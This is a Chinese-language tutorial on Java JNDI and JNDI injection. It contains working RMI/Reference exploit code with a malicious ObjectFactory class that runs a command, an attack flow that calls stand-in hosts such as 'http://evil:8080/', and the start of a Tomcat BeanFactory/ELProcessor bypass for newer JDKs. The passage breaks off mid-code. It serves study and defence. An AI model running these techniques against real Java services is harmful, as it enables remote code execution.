背景知识

JNDI Service Provider

JNDI 与 JNDI Service Provider 的关系类似于 Windows 中 SSPI 与 SSP 的关系。前者是统一抽象出来的接口,而后者是对接口的具体实现。如默认的 JNDI Service ProviderRMI/LDAP 等等。

ObjectFactory

每一个 Service Provider 可能配有多个 Object FactoryObject Factory 用于将 Naming Service(如 RMI/LDAP)中存储的数据转换为 Java 中可表达的数据,如 Java 中的对象或 Java 中的基本数据类型。 JNDI 的注入的问题就出在了可远程下载自定义的 ObjectFactory 类上。你如果有兴趣的话可以完整看一下 Service Provider 是如何与多个 ObjectFactory 进行交互的。

JNDI概述

JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。目录服务是命名服务的一种自然扩展。
JNDI是一个应用程序设计的API,为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口,类似JDBC都是构建在抽象层上。允许客户端通过名称发现和查找数据、对象。这些对象可以存储在不同的命名或目录服务中,就像人的名字或DNS中的域名与IP的关系。
JNDI由JNDI API命名管理JNDI SPI(service provider interface)服务提供的接口组成。我们的应用可以通过JNDI的API去访问相关服务提供的接口
image-20210808152033632
JDNI的服务是可以拓展的,可以从JNDI页面下载其他服务提供商,也可以从远程获得其他服务提供商 JDK包括以下命名/目录服务的服务:

  • 轻型目录访问协议(ldap)
  • 通用对象请求代理体系结构(CORBA),通用对象服务(COS)名称服务
  • Java远程方法调用(RMI)注册表
  • 域名服务(DNS)

Java命名和目录接口(JNDI)是一种Java API,类似一个索引中心,它允许客户端通过name发现和查找数据和对象。其应用场景比如:动态加载数据库配置文件,从而保持数据库代码不变动等。
代码格式如下:

  1. //指定需要查找name名称
  2. String jndiName= "Test";
  3. //初始化默认环境
  4. Context context = new InitialContext();
  5. //查找该name的数据
  6. DataSource ds = (DataSourse)context.lookup(jndiName);

这里的jndiName变量的值可以是上面的命名/目录服务列表里面的值,如果JNDI名称可控的话可能会被攻击。
那上面提到的命名目录是什么?

  • 命名服务:命名服务是一种简单的键值对绑定,可以通过键名检索值,RMI就是典型的命名服务
  • 目录服务:目录服务是命名服务的拓展。它与命名服务的区别在于它可以通过对象属性来检索对象

举个例子:比如你要在某个学校里里找某个人,那么会通过:年级->班级->姓名这种方式来查找,年级、班级、姓名这些就是某个人的属性,这种层级关系就很像目录关系,所以这种存储对象的方式就叫目录服务。LDAP是典型的目录服务

其实,仔细一琢磨就会感觉其实命名服务与目录服务的本质是一样的,都是通过键来查找对象,只不过目录服务的键要灵活且复杂一点。
在一开始很多人都会被jndi、rmi这些词汇搞的晕头转向,而且很多文章中提到了可以用jndi调用rmi,就更容易让人发昏了。我们只要知道jndi是对各种访问目录服务的逻辑进行了再封装,也就是以前我们访问rmi与ldap要写的代码差别很大,但是有了jndi这一层,我们就可以用jndi的方式来轻松访问rmi或者ldap服务,这样访问不同的服务的代码实现基本是一样的。一图胜千言:
image-20210808153848550
从图中可以看到jndi在访问rmi时只是传了一个键foo过去,然后rmi服务端返回了一个对象,访问ldap这种目录服务时,传过去的字符串比较复杂,包含了多个键值对,这些键值对就是对象的属性,LDAP将根据这些属性来判断到底返回哪个对象。

JNDI类

在Java JDK里面提供了5个包,提供给JNDI的功能实现,分别是:

  1. //主要用于命名操作,它包含了命名服务的类和接口,该包定义了Context接口和InitialContext类;
  2. javax.naming
  3. //主要用于目录操作,它定义了DirContext接口和InitialDir- Context类;
  4. javax.naming.directory
  5. //在命名目录服务器中请求事件通知;
  6. javax.naming.event
  7. //提供LDAP支持;
  8. javax.naming.ldap
  9. //允许动态插入不同实现,为不同命名目录服务供应商的开发人员提供开发和实现的途径,以便应用程序通过JNDI可以访问相关服务。
  10. javax.naming.spi

InitialContext类

在这JDK里面给的解释是构建初始上下文,其实通俗点来讲就是获取初始目录环境。

构造方法

  1. //构建一个初始上下文。
  2. InitialContext()
  3. //构造一个初始上下文,并选择不初始化它。
  4. InitialContext(boolean lazy)
  5. //使用提供的环境构建初始上下文。
  6. InitialContext(Hashtable<?,?> environment)
  • 实现代码 ``` InitialContext initialContext = new InitialContext();
  1. #### 常用方法

//将名称绑定到对象。 bind(Name name, Object obj)

//枚举在命名上下文中绑定的名称以及绑定到它们的对象的类名。 list(String name)

//检索命名对象。 lookup(String name)

//将名称绑定到对象,覆盖任何现有绑定。 rebind(String name, Object obj)

//取消绑定命名对象。 unbind(String name)

  1. - 实现代码

package org.example;

import javax.naming.InitialContext; import javax.naming.NamingException; import java.rmi.RemoteException;

public class Client { public static void main( String[] args ) throws NamingException, RemoteException { String uri = “rmi://127.0.0.1:1099/test”; InitialContext initialContext = new InitialContext(); HelloInterface helloInterface = (HelloInterface) initialContext.lookup(uri); System.out.println(helloInterface.says(“hello”)); } }

  1. ### Reference类
  2. 该类也是在`javax.naming`的一个类,该类表示对在命名/目录系统外部找到的对象的引用。提供了JNDI中类的引用功能。<br />在一些命名服务系统中,系统并不是直接将对象存储在系统中,而是保持对象的引用。引用包含了如何访问实际对象的信息。具体可以查看[Java技术回顾之JNDI:命名和目录服务基本概念](https://blog.csdn.net/ericxyy/article/details/2012287)。
  3. #### 构造方法

//为类名为“className”的对象构造一个新的引用。
Reference(String className)

//为类名为“className”的对象和地址构造一个新引用。 Reference(String className, RefAddr addr)

//为类名为“className”的对象,对象工厂的类名和位置以及对象的地址构造一个新引用。 Reference(String className, RefAddr addr, String factory, String factoryLocation)

//为类名为“className”的对象以及对象工厂的类名和位置构造一个新引用。 Reference(String className, String factory, String factoryLocation)

  1. - 实现代码

String url = “http://127.0.0.1:8080“; Reference reference = new Reference(“test”, “test”, url);

  1. > 在使用Reference时,我们可以直接将对象传入构造方法中,当被调用时,对象的方法就会被触发,创建Reference实例时几个比较关键的属性:
  2. > 参数1`className` - 远程加载时所使用的类名
  3. > 参数2`classFactory` - 加载的`class`中需要实例化类的名称
  4. > 参数3`classFactoryLocation` - 提供`classes`数据的地址可以是`file/ftp/http`协议
  5. Reference类表示对存在于命名/目录系统以外的对象的引用。如果远程获取 RMI 服务上的对象为 Reference 类或者其子类,则在客户端获取到远程对象存根实例时,可以从其他服务器上加载 class 文件来进行实例化。<br />Java为了将Object对象存储在NamingDirectory服务下,提供了Naming Reference功能,对象可以通过绑定Reference存储在NamingDirectory服务下,比如RMILDAP等。<br />**[补充](#JNDI Naming Reference)**
  6. #### 常用方法

void add(int posn, RefAddr addr) 将地址添加到索引posn的地址列表中。
void add(RefAddr addr) 将地址添加到地址列表的末尾。
void clear() 从此引用中删除所有地址。
RefAddr get(int posn) 检索索引posn上的地址。
RefAddr get(String addrType) 检索地址类型为“addrType”的第一个地址。
Enumeration getAll() 检索本参考文献中地址的列举。
String getClassName() 检索引用引用的对象的类名。
String getFactoryClassLocation() 检索此引用引用的对象的工厂位置。
String getFactoryClassName() 检索此引用引用对象的工厂的类名。
Object remove(int posn) 从地址列表中删除索引posn上的地址。
int size() 检索此引用中的地址数。
String toString() 生成此引用的字符串表示形式。

  1. ## JNDI代码实现
  2. JNDI中提供了绑定和查找的方法
  3. - **bind(Name name, Object obj)** :将名称绑定到对象中
  4. - **lookup(String name)**: 通过名字检索执行的对象
  5. ### 实现过程
  6. 类似rmi的实现过程,只不过最后绑定和检索的时候有一点差别。
  7. - 定义远程接口
  8. - 服务端实现远程接口
  9. - 服务端注册远程对象
  10. - 客户端调用接口
  11. ### 实现举例
  12. #### HelloInterface.class(定义远程接口)

package org.example;

import java.rmi.Remote; import java.rmi.RemoteException;

public interface HelloInterface extends Remote { String says (String name) throws RemoteException; }

  1. #### HelloImpl.class(HelloInterface远程接口实现类)

package org.example;

import java.rmi.RemoteException; import java.rmi.server.UnicastRemoteObject;

public class HelloImpl extends UnicastRemoteObject implements HelloInterface{ protected HelloImpl() throws RemoteException { }

  1. @Override
  2. public String says(String name) throws RemoteException {
  3. return "test " + name;
  4. }

}

  1. #### Server.class(注册远程对象并绑定)

package org.example;

import javax.naming.Context; import javax.naming.InitialContext; import javax.naming.NamingException; import java.rmi.AlreadyBoundException; import java.rmi.RemoteException; import java.rmi.registry.LocateRegistry; import java.util.Properties;

public class Server {

  1. public static void main(String[] args) throws RemoteException, AlreadyBoundException, NamingException {
  2. //配置JNDI工厂和JNDI的url和端口。如果没有配置这些信息,会出现NoInitialContextException异常
  3. Properties env = new Properties();
  4. env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory");
  5. env.put(Context.PROVIDER_URL,"rmi://127.0.0.1:1099");
  6. //初始化环境
  7. InitialContext ctx = new InitialContext(env);
  8. // 创建一个注册表
  9. LocateRegistry.createRegistry(1099);
  10. // 远程调用对象
  11. HelloInterface hello = new HelloImpl();
  12. // 绑定
  13. ctx.bind("test", hello);
  14. }

}

  1. #### Client.class(远程调用)

package org.example;

import javax.naming.InitialContext; import javax.naming.NamingException; import java.rmi.RemoteException;

public class Client { public static void main( String[] args ) throws NamingException, RemoteException { //初始化环境 InitialContext init = new InitialContext(); //JNDI的方式获取远程对象 HelloInterface hello = (HelloInterface) init.lookup(“rmi://127.0.0.1:1099/test”); // 调用方法 System.out.println(hello.says(“123”)); } }

  1. ![image-20210808180454222](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987595317-cf22b157-65b3-4cb5-a324-3b8443c4a8fe.png)
  2. ## JNDI动态协议转换
  3. 我们上面的demo提前配置了jndi的初始化环境,还配置了`Context.PROVIDER_URL`,这个属性指定了到哪里加载本地没有的类,所以,上面的demo中<br />
  4. `init.lookup("rmi://127.0.0.1:1099/test")`这一处代码改为`init.lookup("test")`也是没啥问题的。<br />那么动态协议转换是个什么意思呢?其实就是说即使提前配置了`Context.PROVIDER_URL`属性,当我们调用`lookup()`方法时,如果`lookup`方法的参数像demo中那样是一个`uri地址`,那么客户端就会去`lookup()`方法参数指定的`uri`中加载远程对象,而不是去`Context.PROVIDER_URL`设置的地址去加载对象(如果感兴趣可以跟一下源码,可以看到具体的实现)。<br />**正是因为有这个特性,才导致当`lookup()`方法的参数可控时,攻击者可以通过提供一个恶意的url地址来控制受害者加载攻击者指定的恶意类。**<br />但是你以为直接让受害者去攻击者指定的rmi注册表加载一个类回来就能完成攻击吗,是不行的,因为受害者本地没有攻击者提供的类的class文件,所以是调用不了方法的,所以我们需要借助接下来要提到的东西。
  5. ## JNDI Naming Reference
  6. `Reference类`表示对存在于命名/目录系统以外的对象的引用。如果远程获取 RMI 服务上的对象为 Reference 类或者其子类,则在客户端获取到远程对象存根实例时,可以从其他服务器上加载 class 文件来进行实例化。<br />Java为了将Object对象存储在NamingDirectory服务下,提供了Naming Reference功能,对象可以通过绑定Reference存储在NamingDirectory服务下,比如RMILDAP等。<br />在使用Reference时,我们可以直接将对象传入构造方法中,当被调用时,对象的方法就会被触发,创建Reference实例时几个比较关键的属性:
  7. - `className`:远程加载时所使用的类名;
  8. - `classFactory`:加载的class中需要实例化类的名称;
  9. - `classFactoryLocation`:远程加载类的地址,提供classes数据的地址可以是file/ftp/http等协议;
  10. 当然,要把一个对象绑定到`RMI注册表`中,这个对象需要继承`UnicastRemoteObject`,但是`Reference`没有继承它,所以我们还需要封装一下它,用 `ReferenceWrapper` 包裹一下`Reference`实例对象,这样就可以将其绑定到`RMI注册表`,并被远程访问到了

// 第一个参数是远程加载时所使用的类名 // 第二个参数是要加载的类的完整类名(这两个参数可能有点让人难以琢磨,往下看你就明白了) // 第三个参数就是远程class文件存放的地址了 Reference refObj = new Reference(“refClassName”, “insClassName”, “http://example.com:8888/“); ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj); registry.bind(“refObj”, refObjWrapper);

  1. 当有客户端通过**`lookup("refObj")`**获取远程对象时,获取的是一个Reference存根(Stub),由于是Reference的存根,所以客户端会现在本地的classpath中去检查是否存在类`refClassName`,如果不存在则去指定的urlhttp://example.com:8888/refClassName.class)动态加载,并且调用`insClassName`的**无参构造函数**,所以**可以在构造函数里写恶意代码。当然除了在无参构造函数中写利用代码,还可以利用java的 `static代码块` 来写恶意代码,因为static代码块的代码在class文件被加载过后就会立即执行,且只执行一次。**<br />了解更多关于static代码块,参考:[https://www.cnblogs.com/panjun-donet/archive/2010/08/10/1796209.html](0d1864cad85f1a7c6479c4abadfda1f8)
  2. ## JNDI注入
  3. ### JNDI注入原理
  4. 就是将恶意的`Reference类`绑定在RMI注册表中,其中恶意引用指向远程恶意的`class文件`,**当用户在JNDI客户端的`lookup()`函数参数外部可控或`Reference类`构造方法的`classFactoryLocation参数`外部可控时**,会使用户的JNDI客户端访问RMI注册表中绑定的恶意`Reference类`,从而加载远程服务器上的恶意`class文件`在客户端本地执行,最终实现JNDI注入攻击导致远程代码执行<br />![image-20210809203123843](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987597520-8bfb0e84-169d-4aa3-85a5-ea62abc4cc6d.png)
  5. ### JNDI注入的利用条件
  6. - 客户端的`lookup()`方法的参数可控
  7. - 服务端在使用`Reference类`时,`classFactoryLocation`参数可控
  8. 上面两个都是在编写程序时可能存在的脆弱点(**任意一个满足就行**),除此之外,jdk版本在JNDI注入中也起着至关重要的作用,而且不同的攻击Payloadjdk的版本要求也不一致,这里就全部列出来:
  9. - **JDK 6u457u21之后**:`java.rmi.server.useCodebaseOnly`的默认值被设置为`true`。当该值为`true`时,将禁用自动加载远程类文件,仅从`CLASSPATH`和当前JVM`java.rmi.server.codebase`指定路径加载类文件。使用这个属性来防止客户端JVM从其他`Codebase`地址上动态加载类,增加了`RMI ClassLoader`的安全性。
  10. - **JDK 6u1417u1318u121之后:**增加了`com.sun.jndi.rmi.object.trustURLCodebase`选项,默认为`false`,禁止`RMI``CORBA`协议使用远程`codebase`的选项,因此`RMI``CORBA`在以上的JDK版本上已经无法触发该漏洞,但依然可以**通过指定URILDAP协议来进行JNDI注入攻击**。
  11. - **JDK 6u2117u2018u191之后:**增加了`com.sun.jndi.ldap.object.trustURLCodebase`选项,默认为`false`,禁止`LDAP`协议使用远程`codebase`的选项,把LDAP协议的攻击途径也给禁了。
  12. > 可以看出RMICodebase限制明显比LDAP多,所以我们在日站的时候,最好也是用LDAP来进行注入。
  13. ### JNDI注入攻击流程
  14. 1. 攻击者通过可控url触发动态协议转换(`rmi://attack:1090/Exploit`)
  15. 1. 受害者服务器原上下文环境被转换为`rmi://attack:1090/Exploit`
  16. 1. 受害者服务器去`rmi://attack:1090/Exploit`请求绑定对象Exploit,攻击者实现准备好的RMI服务器返回一个`ReferenceWrapper`对象(`Reference("Class1","Class2","http://evil:8080/")`)
  17. 1. 应用获取到`ReferenceWrapper`开始在本地查找`Class1`,发现无,则去请求`http://evil:8080/Class2.class`
  18. 1. web服务器返回事先准备好的恶意class文件,受害者服务器调用`Class2`的构造方法,恶意代码执行
  19. ### JNDI注入举例
  20. #### 创建恶意类Evil(不能带package)

import javax.naming.Context; import javax.naming.Name; import javax.naming.spi.ObjectFactory; import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader; import java.util.Hashtable;

public class Evil implements ObjectFactory { // 实现接口ObjectFactory,不然会报错,虽然不影响执行 public Evil() throws IOException { // 构造方法,加载时会自动调用 exec(“open -na Calculator”); }

  1. public static void exec(String cmd) throws IOException {
  2. Process runcmd = Runtime.getRuntime().exec(cmd);
  3. InputStreamReader inputStreamReader = new InputStreamReader(runcmd.getInputStream());
  4. BufferedReader bufferedReader = new BufferedReader(inputStreamReader);
  5. String tmp;
  6. while ((tmp = bufferedReader.readLine()) != null){
  7. System.out.println(tmp);
  8. }
  9. inputStreamReader.close();
  10. bufferedReader.close();
  11. }
  12. @Override
  13. public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
  14. return null;
  15. }

}

  1. #### 常见RMI服务端,绑定恶意的Reference到rmi注册表

package org.example;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.Context; import javax.naming.InitialContext; import javax.naming.NamingException; import javax.naming.Reference; import java.io.IOException; import java.rmi.registry.LocateRegistry; import java.util.Properties;

public class App {

  1. public static void main(String[] args) throws IOException, NamingException {
  2. //配置JNDI工厂和JNDI的url和端口。如果没有配置这些信息,会出现NoInitialContextException异常
  3. Properties env = new Properties();
  4. env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.rmi.registry.RegistryContextFactory");
  5. env.put(Context.PROVIDER_URL,"rmi://127.0.0.1:1099");
  6. //初始化环境
  7. InitialContext ctx = new InitialContext(env);
  8. // 创建一个注册表
  9. LocateRegistry.createRegistry(1099);
  10. // 绑定恶意的Reference到rmi注册表
  11. // 注意,classFactoryLocation地址后面一定要加上/ 如果不加上/,那么则向web服务请求恶意字节码的时候,则会找不到该字节码
  12. Reference reference = new Reference("Evil", "Evil", "http://127.0.0.1:8888/");
  13. ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
  14. ctx.bind("evil", referenceWrapper);
  15. }

}

  1. ![image-20210817111107687](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987598930-3f5d260d-eaee-4c59-b350-ac45a5f89a63.png)
  2. #### 客户端远程调用evil对应类

package org.example;

import javax.naming.InitialContext; import javax.naming.NamingException;

public class Client { public static void main(String[] args) throws NamingException { System.setProperty(“com.sun.jndi.rmi.object.trustURLCodebase”, String.valueOf(true)); // 参考上面的利用条件,低版本不需要设置 System.setProperty(“com.sun.jndi.ldap.object.trustURLCodebase”, String.valueOf(true)); // 参考上面的利用条件,低版本不需要设置

  1. //初始化环境
  2. InitialContext init = new InitialContext();
  3. // 远程调用evil,然后找不到服务端类Evil,就会调用http://127.0.0.1:8888/Evil.class
  4. init.lookup("rmi://127.0.0.1:1099/evil");
  5. }

}

  1. #### 步骤
  2. - 启动RMI服务端
  3. ![image-20210816172243979](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987601448-2ff4893f-3606-4a0d-ad3e-8bf49f782073.png)
  4. - 编译`Evil.java``Evil.class`,并启动`http`服务
  5. ![image-20210816172437499](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987603269-85072ccd-9d3e-4107-aafb-9e54ca00e8e7.png)
  6. - 客户端运行,远程调用`evil`
  7. ![image-20210816172517617](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987605827-b9fa2d63-016f-43ad-9faf-d2a148af57c6.png)
  8. ### JNDI注入Debug
  9. `lookup`下断点进行分析<br />![](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987608631-f22673cf-942d-47e1-ae90-9a786bce3db7.png)<br />堆栈调用情况<br />![image-20210817165611951](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987614299-c87ae9ad-c85c-49c8-bbb9-26cf9fff81b1.png)<br />首先调用`InitialContext.lookup`,`getURLOrDefaultInitCtx`函数会分析`name`的协议头返回对应协议的环境对象,此处返回`Context`对象的子类`rmiURLContext`对象,然后在对应协议中去`lookup`搜索<br />![image-20210817160721357](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987616221-70151893-872c-4bdb-a16e-73202f698067.png)<br />然后就会调用`GenericURLContext.lookup()`方法,此处`this`为`rmiURLContext`类调用对应类的`getRootURLContext`类为解析RMI地址,不同协议调用这个函数,根据之前`getURLOrDefaultInitCtx(name)`返回对象的类型不同,执行不同的`getRootURLContext`,进入不同的协议路线。<br />![image-20210817163036320](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987618220-75e5c46a-b5f8-454f-8dae-e3f5a5f90729.png)

public Object lookup(String var1) throws NamingException { // 获取rmi注册中心的相关数据 ResolveResult var2 = this.getRootURLContext(var1, this.myEnv); // 获取注册中心对象 Context var3 = (Context)var2.getResolvedObj();

  1. Object var4;
  2. try {
  3. // 去注册中心lookup,进入此处 lookup
  4. var4 = var3.lookup(var2.getRemainingName());
  5. } finally {
  6. var3.close();
  7. }
  8. return var4;
  9. }
  1. 跟进`lookup`,此处调用的是`RegistryContext.lookup()`
  2. > 其中从RMI注册表中`lookup`查询到服务端中目标类的`Reference`后返回一个`ReferenceWrapper_Stub`类实例,该类实例就是客户端的存根、用于实现和服务端进行交互,最后调用`decodeObject()`函数来解析
  3. ![image-20210817163351251](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987619825-88f90a7e-f248-43be-b5be-c3a5131c4fb8.png)<br />然后跟进`RegistryContext.decodeObject`,先判断入参`ReferenceWrapper_Stub`类实例是否是`RemoteReference`接口实现类实例,而`ReferenceWrapper_Stub`类正是实现`RemoteReference`接口类的,因此通过判断调用`getReference()`来获取到`ReferenceWrapper_Stub`类实例中的`Reference`即我们在恶意RMI注册中绑定的恶意`Reference`;再往下调用`NamingManager.getObjectInstance()`来获取远程服务端上的类实例<br />![image-20210817163754175](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987621585-8c3ef186-65aa-4bce-b48d-530b56c51c4f.png)<br />继续跟`NamingManager.getObjectInstance()`<br />![image-20210817163956193](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987624170-63bbdbc7-afef-4aed-a74f-dac5744d93dc.png)<br />进入`getObjectFactoryFromReference`,到`loadClass()`时,就会向工厂请求恶意的`class`<br />![image-20210817165349901](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987627317-9fd942e9-3874-4440-acf8-9869d7648bf4.png)<br />然后看到了熟悉的`newInstance()`(实例化),想想写的`Evil.java` 只有一个构造函数,实例化之后,就会执行构造函数中的恶意代码。<br />![image-20210817164115121](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987630466-d6ccb070-057f-44e8-9f93-2020bf8fc2af.png)<br />实例化后:<br />![image-20210817165516619](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987634898-37f37f35-257b-4888-b994-c105da9a93ec.png)<br />继续跟,`getObjectFactoryFromReference()`返回的类需要为`ObjectFactory`,所以这里也是**为什么我们的恶意类要实现`ObjectFactory`这个接口**,不然会报错,但是不影响执行。<br />![image-20210817170040839](https://cdn.nlark.com/yuque/0/2022/png/2976988/1646987637680-a97c75ed-72da-4980-866f-40cedb62ddfb.png)
  4. ## 绕过高版本JDK(8u191+)限制
  5. > [如何绕过高版本JDK的限制进行JNDI注入利用](e1324375b03ce7532c133e263471d9b2)
  6. > [绕过高版本JDK8u191+)限制](https://www.mi1k7ea.com/2020/09/07/%E6%B5%85%E6%9E%90%E9%AB%98%E4%BD%8E%E7%89%88JDK%E4%B8%8B%E7%9A%846.JNDI%E6%B3%A8%E5%85%A5%E5%8F%8A%E7%BB%95%E8%BF%87/#0x02-%E7%BB%95%E8%BF%87%E9%AB%98%E7%89%88%E6%9C%ACJDK%EF%BC%888u191-%EF%BC%89%E9%99%90%E5%88%B6)
  7. > [Exploitng JNDI Injection In Java](http://www.yulegeyu.com/2019/01/11/Exploitng-JNDI-Injection-In-Java/)
  8. 由前面知道,在JDK 6u2117u2018u19111.0.1之后,增加了`com.sun.jndi.ldap.object.trustURLCodebase`选项,默认为`false`,禁止LDAP协议使用远程codebase的选项,把LDAP协议的攻击途径也给禁了。<br />两种绕过方法如下:
  9. 1. 找到一个受害者本地CLASSPATH中的类作为恶意的Reference Factory工厂类,并利用这个本地的Factory类执行命令。
  10. 1. 利用LDAP直接返回一个恶意的序列化对象,JNDI注入依然会对该对象进行反序列化操作,利用反序列化Gadget完成命令执行。
  11. 这两种方式都非常依赖受害者本地CLASSPATH中环境,需要利用受害者本地的Gadget进行攻击。<br />简单地说,**在低版本JDKJNDI注入中,主要利用的就是`classFactoryLocation`这个参数来实现远程加载类利用的。但是在高版本JDK中对`classFactoryLocation`这个途径实现了限制,但是对于`classFactory`这个参数即本地`ClassPath`中如果存在Gadget的话还是能够进行JNDI注入攻击的**。<br />我们先来看一些基本概念,然后再分析这两种绕过方法。
  12. ### 关于Codebase
  13. Oracle官方关于Codebase的说明:[https://docs.oracle.com/javase/1.5.0/docs/guide/rmi/codebase.html](f212e8b1771ecb96c6845b12cf45887e)<br />Codebase指定了Java程序在网络上远程加载类的路径。RMI机制中交互的数据是序列化形式传输的,但是传输的只是对象的数据内容,RMI本身并不会传递类的代码。当本地没有该对象的类定义时,RMI提供了一些方法可以远程加载类,也就是RMI动态加载类的特性。<br />当对象发送序列化数据时,会在序列化流中附加上Codebase的信息,这个信息告诉接收方到什么地方寻找该对象的执行代码。Codebase实际上是一个URL表,该URL上存放了接收方需要的类文件。在大多数情况下,你可以在命令行上通过属性 java.rmi.server.codebase 来设置Codebase。<br />例如,如果所需的类文件在`Evil`的根目录下,那么设置Codebase的命令行参数如下(如果你把类文件打包成了jar,那么设置Codebase时需要指定这个jar文件):

-Djava.rmi.server.codebase=http://url:8080/

  1. 当接收程序试图从该URL`Evil`上下载类文件时,它会把类的包名转化成目录,在Codebase 的对应目录下查询类文件,如果你传递的是类文件 `com.project.test` ,那么接受方就会到下面的URL去下载类文件:

http://url:8080/com/project/test.class

  1. ### 关于JNDI Naming Reference的限制
  2. 如前文所述,JDK 7u21开始,`java.rmi.server.useCodebaseOnly` 默认值就为true,防止RMI客户端VM从其他Codebase地址上动态加载类。然而JNDI注入中的Reference Payload并不受useCodebaseOnly影响,因为它没有用到 `RMI Class loading`,它最终是通过`URLClassLoader`加载的远程类。
  3. > NamingManager.java

static ObjectFactory getObjectFactoryFromReference(Reference ref, String factoryName) throws IllegalAccessException, InstantiationException, MalformedURLException { Class<?> clas = null;

  1. // Try to use current class loader
  2. try {
  3. clas = helper.loadClass(factoryName);
  4. } catch (ClassNotFoundException e) {
  5. // ignore and continue
  6. // e.printStackTrace();
  7. }
  8. // All other exceptions are passed up.
  9. // Not in class path; try to use codebase
  10. String codebase;
  11. if (clas == null &&
  12. (codebase = ref.getFactoryClassLocation()) != null) {
  13. try {
  14. clas = helper.loadClass(factoryName, codebase);
  15. } catch (ClassNotFoundException e) {
  16. }
  17. }
  18. return (clas != null) ? (ObjectFactory) clas.newInstance() : null;

}

  1. 代码中会先尝试在本地CLASSPATH中加载类,不行再从Codebase中加载,`codebase`的值是通过`ref.getFactoryClassLocation()`获得。

public Class<?> loadClass(String className, String codebase) throws ClassNotFoundException, MalformedURLException {

  1. ClassLoader parent = getContextClassLoader();
  2. ClassLoader cl =
  3. URLClassLoader.newInstance(getUrlArray(codebase), parent);
  4. return loadClass(className, cl);

}

  1. 最后通过 `VersionHelper12.loadClass()` `URLClassLoader` 加载了远程class。所以`java.rmi.server.useCodebaseOnly`不会限制JNDI Reference的利用,有影响的是高版本JDK中的这几个系统属性:
  2. - `com.sun.jndi.rmi.object.trustURLCodebase`
  3. - `com.sun.jndi.cosnaming.object.trustURLCodebase`
  4. - `com.sun.jndi.ldap.object.trustURLCodebase`
  5. 做个实验,我们在JDK1.8.0_181下使用 RMI Server 构造恶意的JNDI Reference进行JNDI注入,报错如下:

Exception in thread “main” javax.naming.ConfigurationException: The object factory is untrusted. Set the system property ‘com.sun.jndi.rmi.object.trustURLCodebase’ to ‘true’. at com.sun.jndi.rmi.registry.RegistryContext.decodeObject(RegistryContext.java:495) at com.sun.jndi.rmi.registry.RegistryContext.lookup(RegistryContext.java:138) at com.sun.jndi.toolkit.url.GenericURLContext.lookup(GenericURLContext.java:205) at javax.naming.InitialContext.lookup(InitialContext.java:417)

  1. 而此时使用LDAP Server返回恶意Reference是可以成功利用的,因为JDK 8u191以后才对LDAP JNDI Reference进行了限制。
  2. ### 绕过高版本JDK限制:利用本地Class作为Reference Factory
  3. 在高版本中(如:JDK8u191以上版本)虽然不能从远程加载恶意的`Factory`,但是我们依然可以在**返回的`Reference`中指定`Factory Class`;**
  4. 1. **这个工厂类必须在受害目标本地的`CLASSPATH`中**
  5. 1. **工厂类必须实现 `javax.naming.spi.ObjectFactory` 接口**
  6. 1. **至少存在一个 `getObjectInstance()` 方法**
  7. `org.apache.naming.factory.BeanFactory` 刚好满足条件并且存在被利用的可能。`org.apache.naming.factory.BeanFactory` 存在于Tomcat依赖包中,所以使用也是非常广泛。<br />该类在 `getObjectInstance()` 中会通过反射的方式实例化Reference所指向的`任意Bean Class`,并且会调用setter方法为所有的属性赋值。而该Bean Class的类名、属性、属性值,全都来自于Reference对象,均是攻击者可控的。
  8. #### 利用举例
  9. 根据`beanFactory`的代码逻辑,要求传入的`Reference``ResourceRef`类,这个情况下,目标`Bean Class`必须有一个无参构造方法,有publicsetter方法且参数为一个String类型。事实上,这些setter不一定需要是set..开头的方法,根据`org.apache.naming.factory.BeanFactory`中的逻辑,**我们可以把某个方法强制指定为setter**。<br />然后大佬们找到了`javax.el.ELProcessor`可以作为目标Class
  10. ##### pom.xml(双方均需要)
org.apache.tomcat tomcat-catalina 8.5.0 org.apache.el com.springsource.org.apache.el 7.0.26
  1. ##### Server

package org.example;

import com.sun.jndi.rmi.registry.ReferenceWrapper; import org.apache.naming.ResourceRef;

import javax.naming.NamingException; import javax.naming.StringRefAddr; import java.io.IOException; import java.rmi.AlreadyBoundException; import java.rmi.registry.LocateRegistry; import java.rmi.registry.Registry;

public class App {

  1. public static void main(String[] args) throws IOException, NamingException, AlreadyBoundException {
  2. Registry registry = LocateRegistry.createRegistry(1099);
  3. System.out.println("RMI LISTEN PORT 1099");
  4. // 实例化Reference,指定目标类为javax.el.ELProcessor,工厂类为org.apache.naming.factory.BeanFactory
  5. ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
  6. // 强制将 'x' 属性的setter 从 'setX' 变为 'eval', 详细逻辑见 BeanFactory.getObjectInstance 代码
  7. ref.add(new StringRefAddr("forceString", "x=eval"));
  8. // 利用表达式执行命令
